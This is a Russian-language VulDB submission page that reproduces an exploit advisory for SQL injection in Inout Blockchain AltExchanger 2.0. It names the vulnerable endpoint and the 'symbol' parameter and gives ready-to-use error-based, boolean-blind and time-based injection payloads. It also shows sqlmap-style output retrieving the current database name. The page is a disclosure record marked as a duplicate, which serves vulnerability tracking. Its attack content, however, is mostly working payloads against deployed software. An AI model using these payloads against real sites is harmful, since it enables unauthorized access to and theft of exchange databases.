Отправить #177561: Inout Blockchain AltExchanger 2.0 - SQL InjectionИнформация

НазваниеInout Blockchain AltExchanger 2.0 - SQL Injection
Описание# Exploit Title: Inout Blockchain AltExchanger 2.0 - SQL Injection # Date: 04/07/2023 # Exploit Author: CraCkEr # Vendor: Inout Scripts # Vendor Homepage: https://www.inoutscripts.com/ # Software Link: https://www.inoutscripts.com/products/inout-blockchain-altexchanger/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /application/third_party/Chart/TradingView/chart_content/master.php/history https://website/application/third_party/Chart/TradingView/chart_content/master.php/history?symbol=[SQLI]&resolution=5&from=1688226203&to=1688229203 GET parameter 'symbol' is vulnerable to SQL Injection --- Parameter: symbol (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: symbol=ZRX-BTC') AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: symbol=ZRX-BTC') AND 06585=6585 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: symbol=ZRX-BTC'XOR(IF(now()=sysdate(),SLEEP(8),0))XOR'Z&resolution=5&from=1688226203&to=1688229203 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_altexchanger_***' [-] Done
Пользователь
 skalvin (UID 49463)
Представление04.07.2023 18:01 (3 лет назад)
Модерация11.07.2023 17:23 (7 days later)
СтатусДубликат
Запись VulDB200588 [Inout Blockchain AltExchanger master.php Символ SQL-инъекция]
Баллы0

Interested in the pricing of exploits?

See the underground prices here!